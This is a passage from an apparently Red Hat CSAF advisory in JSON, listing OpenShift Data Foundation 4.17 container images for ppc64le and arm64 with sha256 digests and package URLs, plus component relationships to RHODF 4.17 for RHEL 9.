"purl": "pkg:oci/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product_id": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product": {
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product_id": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product_id": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product_id": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product_id": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product_id": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product_id": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product_id": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product_id": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product_id": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product_id": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64"
